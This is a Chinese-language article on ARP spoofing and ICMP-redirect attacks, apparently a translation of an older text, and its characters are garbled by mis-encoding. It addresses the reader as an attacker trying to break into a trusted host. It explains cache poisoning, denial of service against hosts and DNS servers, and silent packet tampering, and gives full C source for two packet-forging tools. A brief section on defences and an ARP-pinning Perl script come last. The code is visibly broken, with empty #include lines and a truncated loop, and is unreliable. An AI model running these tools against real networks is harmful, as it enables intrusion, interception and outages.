對于旁觀者來說，事物的缺點(diǎn)和優(yōu)點(diǎn)往往是同時存在的。我很高興可以向你們顯示兩個正規(guī)的協(xié)議——arp和icmp，當(dāng)你用一些特殊的方法使用它們的時候，卻得到意想不到的結(jié)果。

相對于被動攻擊（網(wǎng)絡(luò)監(jiān)聽sniffing）來說，主動攻擊使用的并不普遍——許多管理員都擁有一個網(wǎng)絡(luò)監(jiān)聽工具，幫助他們管理局域網(wǎng)。在你的LAN中，主動攻擊將會給你的生活添加光彩和樂趣。你知道，僅僅是一些技術(shù)細(xì)節(jié)使得這些角落有些昏暗不明。那么，我們?nèi)タ纯茨抢锞烤褂行┦鞘裁础?/P>

我們首先描述一下網(wǎng)絡(luò)欺騙（spoofing）和拒絕服務(wù)（DoS-deny of service）。象IP盲攻擊一樣，網(wǎng)絡(luò)攻擊常常非常普通并且功能強(qiáng)大，但是對使用者來說，需要做大量的工作（常常是猜），而且難于實(shí)行。但是ARP欺騙正好相反，它非常容易使用且方便。

一、ARP欺騙

ARP欺騙往往應(yīng)用于一個內(nèi)部網(wǎng)絡(luò)，我們可以用它來擴(kuò)大一個已經(jīng)存在的網(wǎng)絡(luò)安全漏洞。如果你可以入侵一個子網(wǎng)內(nèi)的機(jī)器，其它的機(jī)器安全也將受到ARP欺騙的威脅。

讓我們考慮一下的網(wǎng)絡(luò)結(jié)構(gòu)

IP        10.0.0.1  10.0.0.2  10.0.0.3  10.0.0.4
hostname   cat     rat      dog     bat
hw addr  AA:AA    BB:BB    CC:CC    DD:DD

所有的主機(jī)在以太網(wǎng)中以簡單的方式進(jìn)行連接（沒有交換機(jī)，智能HUB）。你是cat，你具有root權(quán)限，你的目標(biāo)是侵入dog。而你知道dog信任rat，所以如果你能偽裝成rat，那么你就能獲得一些意外的東西。

也許你首先想到的是，“為什么我不把我的IP設(shè)成rat的，然后...”，這種方式無法工作，無法可靠的工作。如果你將cat的IP設(shè)置成10.0.0.2，那么cat將以這個IP回答ARP請求。但是rat也會的。這樣你們就進(jìn)入了一個純粹的競爭狀態(tài)，而這場比賽沒有贏家。相反的，你會輕易的輸?shù)暨@場比賽，因?yàn)樵S多工具會立即發(fā)現(xiàn)這種IP沖突的現(xiàn)象，抱怨之聲隨之而來。一些網(wǎng)絡(luò)交通分析工具還常常對它進(jìn)行紀(jì)錄。在網(wǎng)絡(luò)管理員的日志文件中還會保留一條惡心的紀(jì)錄（cat的物理地址），這可不是你想要的。你的不到你想要的東西，并且與你的目標(biāo)背道而馳。

這個東西是你想要的，一個攻擊程序——send_arp.c，一個非常有效的工具。正如它的名字所示，它發(fā)送一個ARP包（ARP回答，準(zhǔn)確的說：由于這個協(xié)議是無狀態(tài)的，即使在沒有請求的時候也可以做出應(yīng)答。請求同應(yīng)答是一樣的。）向網(wǎng)絡(luò)上，你可以把這個包做成你想要的樣子。而你想要的只不過是可以去定制源IP與目的IP，還有硬件地址。

當(dāng)你進(jìn)行ARP欺騙的時候，你不希望你的網(wǎng)卡亂說話，那么你可以用“ifconfig eth0 -arp”關(guān)掉你的ARP協(xié)議。當(dāng)然，無論如何你都需要ARP的信息，手動的構(gòu)建它并使它發(fā)向內(nèi)核。重要的事你要獲得你周圍人們的信任。在這個例子中，你希望dog認(rèn)為rat的硬件地址是AA:AA（cat），所以你發(fā)送一個ARP應(yīng)答，它的源地址是10.0.0.2,源硬件地址是AA:AA,目標(biāo)地址是10.0.0.3和目標(biāo)硬件地址是CC:CC?，F(xiàn)在，dog完全相信rat的硬件地址是AA:AA。當(dāng)然dog中緩存會過期，所以它需要更新（重新發(fā)送請求）。多長時間發(fā)出請求，各個操作系統(tǒng)不同，但是大多來說是40秒鐘左右。經(jīng)常發(fā)送ARP應(yīng)答，這對你來說不會有壞處的。

對于ARP緩存處理方法的不同會帶來問題的復(fù)雜性。一些操作系統(tǒng)（例如Linux）會用向緩存地址發(fā)非廣播的ARP請求來要求更新緩存（就象你妻子打電話來看你在不在一樣）。這種緩存更新會給你增加麻煩，會使你剛剛偽造的ARP緩存被更改掉，所以必須避免此事發(fā)生。經(jīng)常的向dog發(fā)出應(yīng)答數(shù)據(jù)，這樣它就不會發(fā)出請求。正是預(yù)防為主。對于rat來說，它根本就沒有機(jī)會來改變這一切。

所以過程是簡單的。首先來設(shè)置網(wǎng)絡(luò)接口別名（ifconfig eth0:1 10.0.0.2），添加rat的IP地址并且打開ARP協(xié)議（ifconfig eth0 arp）——你需要設(shè)置你的ARP緩存，當(dāng)沒有ARP時，它不會工作。然后在正確的網(wǎng)絡(luò)接口上設(shè)置到dog的路由。再設(shè)置dog的ARP緩存。最后，關(guān)掉網(wǎng)絡(luò)接口的ARP功能。這樣一切就OK了。

現(xiàn)在，當(dāng)你用send_arp將毒液注入之后（dog和rat），那么，dog就會認(rèn)為，你就是rat。一定要記住，要持續(xù)不斷的向dog和rat發(fā)出ARP包。這種攻擊方式就僅僅工作在局域網(wǎng)內(nèi)（通常的，ARP包是不會路由的）。一個有趣的嘗試是，把我們上述試驗(yàn)中dog替換成路由器，如果可以實(shí)現(xiàn)的話（我不確定它是否會永遠(yuǎn)成立，路由器的ARP功能不是那么容易欺騙的），你可以輕易的冒充這個局域網(wǎng)內(nèi)的機(jī)器去欺騙這個Internet世界了。所以目標(biāo)可以是任何一臺機(jī)器，但是你要偽裝的機(jī)器，必須是這個局域網(wǎng)內(nèi)的。除了欺騙以外，你還可以用ARP作很多事。藍(lán)天之下，皆可任你遨游?；蛘?，DoS也是一個非常有用的程序。

給rat一個錯誤的硬件地址，是一個非常有效的讓它閉嘴的方法。你可以避免它向一些特殊的機(jī)器發(fā)出請求（一個ARP緩沖池通?？梢匀堇ㄕ麄€網(wǎng)絡(luò)的內(nèi)容，所以你可以在一段時間內(nèi)有效的防止它向其它機(jī)器發(fā)出請求）。非常明顯目標(biāo)也可以是一臺路由器。干擾緩存需要兩步：攪亂被偽裝的機(jī)器和你不希望它與之通訊的機(jī)器。這種方法不是常常奏效，當(dāng)這臺機(jī)器發(fā)現(xiàn)緩存中沒有目標(biāo)機(jī)器時，會主動發(fā)出ARP請求。

當(dāng)然你的下一滴毒液會迅速注入，但是你需要經(jīng)常維持這種狀態(tài)。一個比較有效的方法是，給rat一個錯誤的dog硬件地址，這樣rat既能保持正常的工作狀態(tài)，又不會干擾你的活動。同樣的，這種方法也依賴于不同的環(huán)境，通常的情況是rat會經(jīng)常的向錯誤的目標(biāo)發(fā)出各種不同的包，目標(biāo)會返回ICMP不可抵達(dá)信息，從而用一種不正當(dāng)?shù)姆绞骄S持了連接。這種偽裝的連接可以推遲緩存的更新時間。在Linux上，我們可以是更新時間從1分鐘提升到10分鐘。在這一段時間內(nèi)，你已經(jīng)可以完成一個TCP連接可以完成的大多數(shù)事情了。

這里存在一個有趣被稱為“無理ARP”。在這個ARP請求包中，源IP與目的IP是相同的，通常它是經(jīng)過以太網(wǎng)廣播進(jìn)行發(fā)送。一些執(zhí)行程序認(rèn)為這是一種特殊情況——系統(tǒng)發(fā)出的自身更新信息，并且將這個請求添加在自己的緩存中。這種方式里，影響的是整個網(wǎng)絡(luò)。這是毋庸置疑的，但這并不是ARP協(xié)議的一部分，而是由執(zhí)行者決定是否作（或是不作），這漸漸的變得不受人歡迎。

ARP也可以用來開一些非常專業(yè)的笑話。假想一下某人設(shè)置了一個中繼器或者是一個管道，僅僅是利用自己的機(jī)器去騙取兩臺相鄰機(jī)器的信任，并且把通訊的包都發(fā)給這臺機(jī)器。如果這臺機(jī)器僅僅是轉(zhuǎn)發(fā)數(shù)據(jù)，那么誰也不會發(fā)現(xiàn)。但是當(dāng)它僅僅作一些很少的改動時，就會給你添加非常大的麻煩。例如，隨機(jī)的更改數(shù)據(jù)包中的幾位，這樣就會造成校驗(yàn)和錯誤。數(shù)據(jù)流好像是毫發(fā)無損，卻會毫無原因的出現(xiàn)不可預(yù)料的錯誤。

二、ICMP重定向

另外一個比較有效的并且類似與ARP欺騙的手段是利用另外一個正常的協(xié)議——ICMP重定向。這種重定向通常是由你的默認(rèn)路由器發(fā)來的，通告你有一個到達(dá)某一網(wǎng)絡(luò)的更近的路由。最初，既可以通告網(wǎng)絡(luò)重定向，也可以通告主機(jī)的重定向，但是現(xiàn)在，由于網(wǎng)絡(luò)重定向被否決，僅剩下了主機(jī)重定向。正確的制作一個經(jīng)過完整檢查的ICMP包（必須由默認(rèn)路由器發(fā)來，發(fā)向重定向機(jī)器，新的路由應(yīng)該是一個網(wǎng)絡(luò)的直接連接等等），接收者會對系統(tǒng)的路由表進(jìn)行更新。

這是ICMP的安全問題。偽裝一個路由器的IP地址是簡單的，icmp_redir.c正是作的這個工作。RFC聲明系統(tǒng)必須遵循這個重定向，除非你是路由器。實(shí)際上幾乎所有的系統(tǒng)都支持這一點(diǎn)（除了vanilla Linux 2.0.30）。

ICMP重定向提供了一個非常有力的DoS工具。不像ARP緩存更新，路由表不存在的過期問題。并且不需要在本地網(wǎng)絡(luò)，你可以發(fā)起攻擊從任何地方。所以當(dāng)目標(biāo)接受了ICMP重定向之后（包確切抵達(dá)），目標(biāo)就不會再和網(wǎng)絡(luò)上的一些機(jī)器進(jìn)行通訊（是的，并不是所有的機(jī)器，但是一些與目標(biāo)機(jī)器不在同一個網(wǎng)絡(luò)上的機(jī)器）。域名服務(wù)器會是一個非常好的攻擊目標(biāo)。

/* send_arp.c
    這個程序發(fā)送ARP包，由使用者提供源/目的IP和網(wǎng)卡地址。編譯并運(yùn)行在Linux環(huán)境下，
也可以運(yùn)行在其它的有SOCK_PACKET的Unix系統(tǒng)上。
    這個程序是對上述理論的驗(yàn)證，僅此而已。
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define ETH_HW_ADDR_LEN 6
#define IP_ADDR_LEN 4
#define ARP_FRAME_TYPE 0x0806
#define ETHER_HW_TYPE 1
#define IP_PROTO_TYPE 0x0800
#define OP_ARP_REQUEST 2

#define DEFAULT_DEVICE "eth0"

char usage[]={"send_arp: sends out custom ARP packet.\n
\tusage: send_arp src_ip_addr src_hw_addr targ_ip_addr tar_hw_addr\n\n"};

struct arp_packet {
    u_char targ_hw_addr[ETH_HW_ADDR_LEN];
    u_char src_hw_addr[ETH_HW_ADDR_LEN];
    u_short frame_type;
    u_short hw_type;
    u_short prot_type;
    u_char hw_addr_size;
    u_char prot_addr_size;
    u_short op;
    u_char sndr_hw_addr[ETH_HW_ADDR_LEN];
    u_char sndr_ip_addr[IP_ADDR_LEN];
    u_char rcpt_hw_addr[ETH_HW_ADDR_LEN];
    u_char rcpt_ip_addr[IP_ADDR_LEN];
    u_char padding[18];
};

void die(char *);
void get_ip_addr(struct in_addr*,char*);
void get_hw_addr(char*,char*);

int main(int argc,char** argv){

struct in_addr src_in_addr,targ_in_addr;
struct arp_packet pkt;
struct sockaddr sa;
int sock;

if(argc != 5)die(usage);

sock=socket(AF_INET,SOCK_PACKET,htons(ETH_P_RARP));
if(sock<0){
    perror("socket");
    exit(1);
    }

pkt.frame_type = htons(ARP_FRAME_TYPE);
pkt.hw_type = htons(ETHER_HW_TYPE);
pkt.prot_type = htons(IP_PROTO_TYPE);
pkt.hw_addr_size = ETH_HW_ADDR_LEN;
pkt.prot_addr_size = IP_ADDR_LEN;
pkt.op=htons(OP_ARP_REQUEST);

get_hw_addr(pkt.targ_hw_addr,argv[4]);
get_hw_addr(pkt.rcpt_hw_addr,argv[4]);
get_hw_addr(pkt.src_hw_addr,argv[2]);
get_hw_addr(pkt.sndr_hw_addr,argv[2]);

get_ip_addr(&src_in_addr,argv[1]);
get_ip_addr(&targ_in_addr,argv[3]);

memcpy(pkt.sndr_ip_addr,&src_in_addr,IP_ADDR_LEN);
memcpy(pkt.rcpt_ip_addr,&targ_in_addr,IP_ADDR_LEN);

bzero(pkt.padding,18);

strcpy(sa.sa_data,DEFAULT_DEVICE);
if(sendto(sock,&pkt,sizeof(pkt),0,&sa,sizeof(sa)) < 0){
    perror("sendto");
    exit(1);
    }
exit(0);
}

void die(char* str){
fprintf(stderr,"%s\n",str);
exit(1);
}

void get_ip_addr(struct in_addr* in_addr,char* str){

struct hostent *hostp;

in_addr->s_addr=inet_addr(str);
if(in_addr->s_addr == -1){
    if( (hostp = gethostbyname(str)))
        bcopy(hostp->h_addr,in_addr,hostp->h_length);
    else {
        fprintf(stderr,"send_arp: unknown host %s\n",str);
        exit(1);
        }
    }
}

void get_hw_addr(char* buf,char* str){

int i;
char c,val;

for(i=0;i    if( !(c = tolower(*str++))) die("Invalid hardware address");
    if(isdigit(c)) val = c-'0';
    else if(c >= 'a' && c <= 'f') val = c-'a'+10;
    else die("Invalid hardware address");

    *buf = val << 4;
    if( !(c = tolower(*str++))) die("Invalid hardware address");
    if(isdigit(c)) val = c-'0';
    else if(c >= 'a' && c <= 'f') val = c-'a'+10;
    else die("Invalid hardware address");

    *buf++ |= val;

    if(*str == ':')str++;
    }
}

/* icmp_redir.c
    本程序由用戶提供的網(wǎng)關(guān)地址發(fā)送了一個ICMP主機(jī)重定向數(shù)據(jù)包。在Linux2.0.30上測試通過，并且對大多數(shù)的Unix機(jī)器有效。
    這個程序是對上述理論的驗(yàn)證，僅此而已。
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define IPVERSION 4

struct raw_pkt {
    struct iphdr ip; /* This is Linux-style iphdr.
                Use BSD-style struct ip if you want */
    struct icmphdr icmp;
    struct iphdr encl_iphdr;
    char encl_ip_data[8];
};

struct raw_pkt* pkt;

void die(char *);
unsigned long int get_ip_addr(char*);
unsigned short checksum(unsigned short*,char);

int main(int argc,char** argv){

struct sockaddr_in sa;
int sock,packet_len;
char usage[]={"icmp_redir: send out custom ICMP host redirect packet.
yuri volobuev'97\n
\tusage: icmp_redir gw_host targ_host dst_host dummy_host\n"};
char on = 1;

if(argc != 5)die(usage);

if( (sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0){
    perror("socket");
    exit(1);
    }

sa.sin_addr.s_addr = get_ip_addr(argv[2]);
sa.sin_family = AF_INET;

packet_len = sizeof(struct raw_pkt);
pkt = calloc((size_t)1,(size_t)packet_len);

pkt->ip.version = IPVERSION;
pkt->ip.ihl = sizeof(struct iphdr) >> 2;
pkt->ip.tos = 0;
pkt->ip.tot_len = htons(packet_len);
pkt->ip.id = htons(getpid() & 0xFFFF);
pkt->ip.frag_off = 0;
pkt->ip.ttl = 0x40;
pkt->ip.protocol = IPPROTO_ICMP;
pkt->ip.check = 0;
pkt->ip.saddr = get_ip_addr(argv[1]);
pkt->ip.daddr = sa.sin_addr.s_addr;
pkt->ip.check = checksum((unsigned short*)pkt,sizeof(struct iphdr));

pkt->icmp.type = ICMP_REDIRECT;
pkt->icmp.code = ICMP_REDIR_HOST;
pkt->icmp.checksum = 0;
pkt->icmp.un.gateway = get_ip_addr(argv[4]);

memcpy(&(pkt->encl_iphdr),pkt,sizeof(struct iphdr));
pkt->encl_iphdr.protocol = IPPROTO_IP;
pkt->encl_iphdr.saddr = get_ip_addr(argv[2]);
pkt->encl_iphdr.daddr = get_ip_addr(argv[3]);
pkt->encl_iphdr.check = 0;
pkt->encl_iphdr.check = checksum((unsigned short*)&(pkt->encl_iphdr),
    sizeof(struct iphdr));

pkt->icmp.checksum = checksum((unsigned short*)&(pkt->icmp),
    sizeof(struct raw_pkt)-sizeof(struct iphdr));

if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0) {
    perror("setsockopt: IP_HDRINCL");
    exit(1);
    }

if(sendto(sock,pkt,packet_len,0,(struct sockaddr*)&sa,sizeof(sa)) < 0){
    perror("sendto");
    exit(1);
    }
exit(0);
}

void die(char* str){
fprintf(stderr,"%s\n",str);
exit(1);
}

unsigned long int get_ip_addr(char* str){

struct hostent *hostp;
unsigned long int addr;

if( (addr = inet_addr(str)) == -1){
    if( (hostp = gethostbyname(str)))
        return *(unsigned long int*)(hostp->h_addr);
    else {
        fprintf(stderr,"unknown host %s\n",str);
        exit(1);
        }
    }
return addr;
}

unsigned short checksum(unsigned short* addr,char len){
register long sum = 0;

while(len > 1){
    sum += *addr++;
    len -= 2;
    }
if(len > 0) sum += *addr;
while (sum>>16) sum = (sum & 0xffff) + (sum >> 16);

return ~sum;
}

三、解決方案

對于大多數(shù)人來說，ARP是一個隱藏的底層協(xié)議。你可以時不時的觀察它，但是平常不會有人對它發(fā)生興趣。你可以用arp命令來檢查你的ARP緩存，但是當(dāng)一個網(wǎng)絡(luò)出現(xiàn)問題的時候，這個并不是我們首先想到的。Windows也存在這個命令，記住這一點(diǎn)也許對你有幫助。但是當(dāng)一個ARP欺騙通過網(wǎng)關(guān)從另一個網(wǎng)絡(luò)發(fā)向你時，恐怕你也無能為力了。同樣的，你也可以在你的路由表中發(fā)現(xiàn)重定向的路由信息（route 命令，用“D”標(biāo)志來標(biāo)明）。

ARP攻擊設(shè)計(jì)來攻擊10Base2以太網(wǎng)。如果網(wǎng)絡(luò)已一些比較先進(jìn)的方式進(jìn)行連接，通常是智能HUB或交換機(jī)，那么攻擊就很容易被發(fā)現(xiàn)，甚至是不可能的（類似于被動攻擊）。所以這是一個向你的老板要求更新網(wǎng)絡(luò)設(shè)備的理由。

這么想起來，ICMP重定向真是一個非常瘋狂的想法。首先，一些網(wǎng)絡(luò)的結(jié)構(gòu)非常簡單，對路由表不需要任何添加；其次，大多數(shù)的穩(wěn)定的網(wǎng)絡(luò)上，僅僅是用手動的辦法來更新路由。這并不是一個經(jīng)常更新的工作，為什么要通過ICMP呢？最后，這個對于你來說是非常危險的，你可以在你的系統(tǒng)上關(guān)閉ICMP重定向，這樣可以減少同RFC1122的沖突。哎，這可不容易呀！在Linux這種提供源碼的機(jī)器上，你可以重新編譯內(nèi)核。在Irix 6.2和一些其它的系統(tǒng)上，可以“set icmp_dropredirects=1”。這與其它的OS，我也不知道有什么辦法。

時間證明了這個真理：不要信任未確認(rèn)的主機(jī)。否則，網(wǎng)絡(luò)上帝不會對你施予憐憫的。 一些人認(rèn)為“我有防火墻，我怕誰”，認(rèn)為一些安全問題對它來說無關(guān)緊要。我承認(rèn)防火墻的作用，但是這并不是經(jīng)常有效。

想象這樣一個環(huán)境，所有的機(jī)器都直接與Internet相連，你不得不與你不了解的人共用你的內(nèi)部網(wǎng)，他們使用的是vanilla SGI 的機(jī)器，而他們簡直是在到處告訴別人“來攻擊我吧，我的買主使它非常簡單”（是這樣的，那些人認(rèn)識Unix，從侏羅紀(jì)公園...），另外，通向你的路由器由別的機(jī)構(gòu)控制。讓我們來到一個標(biāo)準(zhǔn)的網(wǎng)絡(luò)環(huán)境，它會提供我們安全，不受外部的攻擊。人們在這里工作，使用電腦。同樣，這里的每臺機(jī)器也存在安全問題。所以，當(dāng)你下一次提到防火墻的時候，請記住它并不能保護(hù)每一個人。

John Goerzen提供了一個Perl腳本，可以在系統(tǒng)啟動時運(yùn)行。它主要是在Linux機(jī)器中維持一個已知的IP地址與硬件地址的緩存，設(shè)置標(biāo)志，以使其不會被更新和改變。配置文件非常簡單——IP addr 配 MAC addr，用空格鍵分割，“#”作為注釋。

這個腳本僅僅在Linux機(jī)器上測試過——在其它平臺上的人需要修改arp命令的格式。

注意：腳本需要運(yùn)行在網(wǎng)絡(luò)接口啟動之后，服務(wù)和客戶運(yùn)行之前；另外，一些人會在ARP被鎖定時竊取連接。以下是它的腳本：

#!/usr/bin/perl
# Program: forcehwaddr
# Program to run ARP to force certain tables.

# Specify filenames to read from on command line, or read from stdin.

foreach (<>) { # For each input line....
chomp; # Strip if CR/LF
if (/^#/) { next; } # If it's a comment, skip it.
if (((($host, $hw) = /\s*(.+?)\s+(\S+)\s*/) == 2) &&
    !(/^#/)) {
    # The text between the slashes parses the input line as follows:
    # Ignore leading whitespace. (\s*)
    # Then, start matching and put it into $host ($host, (.+?))
    # Skip over the whitespace after that (\s+)
    # Start matching. Continue matching until end of line or optional
    # trailing whitespace.

    # Then, the if checks to see that both a
    # host and a hardware address were matched.
    # (2 matches). If not, we skip the
    # line (assuming it is blank or invalid or something).
    # The second part of the if checks to see if the line starts with
    # a pound sign; if so, ignore it (as a comment).

    # Otherwise, run the appropriate command:
    printf("Setting IP %-15s to hardware address %s\n", $host, $hw);
    system "/usr/sbin/arp -s $host $hw\n";
}
}